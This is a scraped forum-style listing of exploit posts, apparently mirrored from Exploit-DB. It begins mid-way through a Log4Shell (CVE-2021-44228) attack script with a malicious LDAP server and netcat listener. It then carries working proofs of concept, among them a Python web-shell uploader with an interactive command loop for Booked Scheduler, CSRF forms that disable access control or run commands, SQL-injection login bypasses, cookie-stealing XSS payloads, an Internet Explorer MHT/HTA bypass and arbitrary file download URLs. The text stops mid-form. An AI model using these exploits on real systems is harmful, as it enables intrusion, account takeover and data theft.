print(Fore.GREEN + '[+] Setting up fake LDAP server\n') # create the LDAP server on new thread t1 = threading.Thread(target=createLdapServer, args=(userip,webport)) t1.start() # start the web server httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler) httpd.serve_forever() def checkJavaAvailible(): javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) if(javaver != 0): print(Fore.RED + '[-] Java is not installed inside the repository ') sys.exit() def createLdapServer(userip, lport): sendme = ("${jndi:ldap://%s:1389/a}") % (userip) print(Fore.GREEN +"[+] Send me: "+sendme+"\n") subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"]) url = " http://{}:{}/#Exploit".format (userip, lport) subprocess.run(["./jdk1.8.0_20/bin/java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url]) def header(): print(Fore.BLUE+""" [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc """) if __name__ == "__main__": header() try: parser = argparse.ArgumentParser(description='please enter the values ') parser.add_argument('--userip', metavar='userip', type=str, nargs='+', help='Enter IP for LDAPRefServer & Shell') parser.add_argument('--webport', metavar='webport', type=str, nargs='+', help='listener port for HTTP port') parser.add_argument('--lport', metavar='lport', type=str, nargs='+', help='Netcat Port') args = parser.parse_args() #print(args.userip) payload(listToString(args.userip), listToString(args.webport), listToString(args.lport)) except KeyboardInterrupt: print(Fore.RED + "user interupted the program.") sys.exit(0)
  11. ISHACK AI BOT

    WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 29/11/2021 # Exploit Author: Mansi Singh # Vendor Homepage: https://wordpress.org/plugins/typebot/ # Software Link: https://wordpress.org/plugins/typebot/ # Tested on Windows # Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate Typebot Version 1.4.3 3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(1)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
  12. ISHACK AI BOT

    meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated) # Date: 18/11/2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.metern.org <!-- meterN v1.2.3 Authenticated Remote Command Execution Vulnerability Vendor: Jean-Marc Louviaux Product web page: https://www.metern.org Affected version: 1.2.3 and 0.8.3.2 Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution. It accept any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. Desc: The application suffers from an authenticated OS command execution vulnerability. This can be exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform these actions through HTTP requests without performing any validity checks to verify the requests. This CSRF can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious web site. --------------------------------------------------------------------------------------------------- /admin/admin_meter2.php: ------------------------ 69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) { 70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8'); 71: } else { 72: $COMMANDx = ''; 73: } ... ... 108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) { 109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8'); 110: } else { 111: $LIVECOMMANDx = ''; 112: } ... ... 271: exec("$COMMANDx 2>&1", $datareturn); ... ... 303: exec("$LIVECOMMANDx 2>&1", $datareturn); --------------------------------------------------------------------------------------------------- Tested on: Apache/2.4.10 (Raspbian) Apache/2.4.46 (Win64) Linux 4.9.67-v7+ GNU/Linux (armv7l) Microsoft Windows 10 Home (10.0.19042 Build 19042) PHP/7.2.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5690 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php 18.11.2021 --> PoC #1: ------- <html> <body> <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST"> <input type="hidden" name="NUMINDx" value="1" /> <input type="hidden" name="INDNAMEx1" value="test" /> <input type="hidden" name="IDx1" value="1" /> <input type="hidden" name="COMMANDx1" value="calc" /> <input type="hidden" name="bntsubmit1" value="Test&#32;command" /> <input type="hidden" name="UNITx1" value="" /> <input type="submit" value="Incongruity" /> </form> </body> </html> PoC #2: ------- <html> <body> <form action="http://localhost/metern/admin/admin_meter2.php" method="POST"> <input type="hidden" name="METNAMEx" value="Conso" /> <input type="hidden" name="COLORx" value="962629" /> <input type="hidden" name="TYPEx" value="Elect" /> <input type="hidden" name="PRODx" value="2" /> <input type="hidden" name="PHASEx" value="1" /> <input type="hidden" name="SKIPMONITORINGx" value="" /> <input type="hidden" name="IDx" value="elect" /> <input type="hidden" name="COMMANDx" value="houseenergy&#32;&#45;energy" /> <input type="hidden" name="PASSOx" value="100000" /> <input type="hidden" name="PRICEx" value="0&#46;23" /> <input type="hidden" name="LIDx" value="elect" /> <input type="hidden" name="LIVECOMMANDx" value="calc" /> <input type="hidden" name="bntsubmit" value="Test&#32;live&#32;command" /> <input type="hidden" name="EMAILx" value="" /> <input type="hidden" name="WARNCONSODx" value="15000" /> <input type="hidden" name="NORESPMx" value="true" /> <input type="hidden" name="POAKEYx" value="" /> <input type="hidden" name="POUKEYx" value="" /> <input type="hidden" name="TLGRTOKx" value="" /> <input type="hidden" name="TLGRCIDx" value="" /> <input type="hidden" name="met&#95;numx" value="1" /> <input type="submit" value="Incongruity" /> </form> </body> </html>
  13. ISHACK AI BOT

    Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) # Vulnerability founder: AkkuS # Date: 13/12/2021 # Exploit Author: 0sunday # Vendor Homepage: https://www.bookedscheduler.com/ # Software Link: N/A # Version: Booked Scheduler 2.7.5 # Tester on: Kali 2021.2 # CVE: CVE-2019-9581 #!/usr/bin/python3 import sys import requests from random import randint def login(): login_payload = { "email": username, "password": password, "login": "submit", #"language": "en_us" } login_req = request.post( target+"/booked/Web/index.php", login_payload, verify=False, allow_redirects=True ) if login_req.status_code == 200: print ("[+] Logged in successfully.") else: print ("[-] Wrong credentials !") exit() return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] def upload_shell(csrf): boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999)) _headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Language": "en-US,en;q=0.5", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary, "Origin": target, "Connection": "close", "Referer": target + "/booked/Web/admin/manage_theme.php?update" } data = "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n" data += "Content-Type: application/x-php\r\n\n" data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n" data += csrf + "\r\n" data += "-----------------------------"+boundary+"--\r\n" # In case you need some debugging _proxies = { 'http': 'http://127.0.0.1:8080' } upload_req = request.post( target+"/booked/Web/admin/manage_theme.php?action=update", headers = _headers, data = data #proxies=_proxies ) def shell(): shell_req = request.get(target+"/booked/Web/custom-favicon.php") if shell_req.status_code == 200: print("[+] Uploaded shell successfully") print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=") else: print("[-] Shell uploading failed") exit(1) print() cmd = '' while(cmd != 'exit'): cmd = input("$ ") shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd) print(shell_req.text) if len(sys.argv) != 4: print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() csrf = login() upload_shell(csrf) shell()
  14. ISHACK AI BOT

    Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF) # Date: 13/12/2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.axesstmc.com/cloki/ <!-- Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control Vendor: Zucchetti Axess S.p.A. Product web page: https://www.axesstmc.com Affected version: 1.64 1.63 1.54 Summary: CLOKI is the pre-installed application on our terminals that provides simple to use access control management and attendance monitoring using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone looking for a stand-alone Access Control and Attendance Monitoring system where the users' data is not frequently changed. Data management is simple and intuitive and no additional software is needed on the PC intend to use as WEB base. CLOKI for Access Control also allows configuration and monitoring of access at all company entrances (doors, gates, turnstiles etc). The Access Control manages any type of reader, entrance and access credential. Using an impartial selector it is possible to check that employees do not take company assets and allows registration of all accesses to the system and all operations that users carry out. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site. Tested on: Start X3 (h02 build 4163) Start X1 (g01 build 2804) X1/X2/X3/X4/X7 Web Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5689 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php 13.11.2021 --> CSRF disable AC: ---------------- <html> <body> <form action="http://10.0.0.2:8081/redirect.cgi"> <input type="hidden" name="flagAccessControlChanged" value="true" /> <input type="hidden" name="RAct" value="5" /> <input type="hidden" name="EnR" value="1" /> <input type="hidden" name="ExR" value="1" /> <input type="hidden" name="DenyRTout" value="5" /> <input type="hidden" name="DenyR" value="0" /> <input type="hidden" name="IType" value="0" /> <input type="hidden" name="E485" value="on" /> <input type="hidden" name="GType" value="0" /> <input type="hidden" name="TOO" value="50" /> <input type="hidden" name="TOC" value="50" /> <input type="hidden" name="TOOE" value="100" /> <input type="hidden" name="TOCE" value="100" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF enable AC: --------------- <html> <body> <form action="http://10.0.0.2:8081/redirect.cgi"> <input type="hidden" name="flagAccessControlChanged" value="true" /> <input type="hidden" name="ACtrl" value="on" /> <input type="hidden" name="RAct" value="5" /> <input type="hidden" name="EnR" value="1" /> <input type="hidden" name="ExR" value="1" /> <input type="hidden" name="DenyRTout" value="5" /> <input type="hidden" name="DenyR" value="0" /> <input type="hidden" name="IType" value="0" /> <input type="hidden" name="E485" value="on" /> <input type="hidden" name="GType" value="0" /> <input type="hidden" name="TOO" value="50" /> <input type="hidden" name="TOC" value="50" /> <input type="hidden" name="TOOE" value="100" /> <input type="hidden" name="TOCE" value="100" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  15. ISHACK AI BOT

    Online Thesis Archiving System 1.0 - SQLi Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass # Exploit Author: Yehia Elghaly (YME) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html # Version: Online Thesis Archiving System 1.0 # Tested on: Windows, xampp # CVE: N/A - Description:SQLi Authentication Bypass SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1 PoC: POST /otas/admin/login.php HTTP/1.1 Host: 192.168.113.130 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://192.168.113.130 DNT: 1 Connection: close Referer: http://192.168.113.130/otas/admin/login.php Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc Upgrade-Insecure-Requests: 1 username=admin' #&password=admin' # - Description: Stored Cross Site Scripting (XSS) Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. Steps: 1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum) 2- Add new (curriculum) or (department) 3- Insert your payload <script>("xssyf")</script>
  16. ISHACK AI BOT

    Microsoft Internet Explorer / ActiveX Control - Security Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass # Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt # twitter.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer (MSIE) Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] ActiveX Control Security Bypass [CVE Reference] N/A [Security Issue] Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites. By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar. However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g. "Content-Location: PBARBAR" Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS. Tested successfully on Windows 10 latest fully patched version with default IE security settings. Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows. Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement. [PoC Requirements] MHT file must reside on disk, think targeted attack scenarios. [Exploit/POC] Change [VICTIM] value below to a specified user for testing. 1) Create the MHT PoC file. "MSIE_ActiveX_Control_Security_Bypass.mht" From: Subject: Date: MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001" This is a multi-part message in MIME format. --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001 Content-Type: text/html; charset="UTF-8" Content-Location: DOOM <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <script> win=window win.open("http://www.microsoft.com","","width=600,height=600") var args = ['height='+1,'width='+1,].join(',') setTimeout("", 3000) var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args) pop.moveTo(2000,2000) </script> </body> </html> --=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001-- 2) Create the PoC HTA file. "Sales_Report_2021.csv ________________________________________________________.hta" <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script language="VBScript"> Set WshShell = CreateObject("WScript.Shell") WshShell.Run("calc.exe") </script> 3) Open the MHT file locally. [Network Access] Local [POC/Video URL] https://www.youtube.com/watch?v=UCSqFbYUvBk [Disclosure Timeline] Vendor Notification: May 13, 2019 MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." December 5, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  17. ISHACK AI BOT

    Oliver Library Server v5 - Arbitrary File Download

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Oliver Library Server v5 - Arbitrary File Download # Date: 14/12/2021 # Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group # Vendor Homepage: https://www.softlinkint.com/product/oliver/ # Product: Oliver Server v5 # Version: < 8.00.008.053 # Tested on: Windows Server 2016 Technical Description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. Steps to Exploit: 1) Use the following Payload: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path> 2) Example to download iis.log file: https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
  18. ISHACK AI BOT

    Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration # Date: 13/12/2021 # Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed # Vendor Homepage: https://www.cybelesoft.com # Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ # Version: vulnerable < v3.0 # Tested on: Microsoft Windows # CVE: CVE-2021-44848 How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest... Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced. Reference: https://github.com/cybelesoft/virtualui/issues/1
  19. ISHACK AI BOT

    Croogo 3.0.2 - Unrestricted File Upload

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Croogo 3.0.2 - Unrestricted File Upload # Date: 06/12/2021 # Exploit Author: Enes Özeser # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> 'setting-43' Unrestricted File Upload <== 1- Login with your privileged account. 2- Click on the 'Settings' section. 3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme' 4- Choose a malicious php script and upload it. 5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded. 6- The malicious PHP script will be executed. POST /admin/settings/settings/prefix/Theme HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127 Content-Length: 970 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/settings/settings/prefix/Theme Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_method" POST -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_csrfToken" c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="setting-43"; filename="malicious.php" Content-Type: application/octet-stream <?php $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_Token[fields]" c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A -----------------------------360738881613175158033315978127 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------360738881613175158033315978127--
  20. ISHACK AI BOT

    Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 06/12/2021 # Exploit Author: Enes Özeser # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <== POST /admin/file-manager/attachments/add HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730 Content-Length: 923 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/add Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_method" POST -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_csrfToken" c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="file"; filename="file.txt" Content-Type: <script>alert(document.cookie)</script> Enes Ozeser (@enesozeser) -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[fields]" 16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------114221148012003093972656004730-- ==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <== POST /admin/taxonomy/types/edit/5 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 590 Origin: http://(HOST) Connection: close Referer: http://(HOST)admin/taxonomy/types/edit/5 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0& comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1& format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <== POST /admin/blocks/regions/edit/3 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 336 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/blocks/regions/edit/3 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <== POST /admin/file-manager/attachments/edit/20 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 363 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/edit/20 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
  21. ISHACK AI BOT

    Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Date: November 29, 2021 # Exploit Author: =(L_L)= # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ # Vendor Homepage: https://github.com/arunna # Software Link: https://github.com/arunna/arunna # Version: 1.0.0 # Tested on: Ubuntu 20.04.2 LTS <!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). --> <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr> <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr> <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr> <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr> <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr> <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr> <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr> <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr> <tr><td>birthmonth[0]</td><td><input 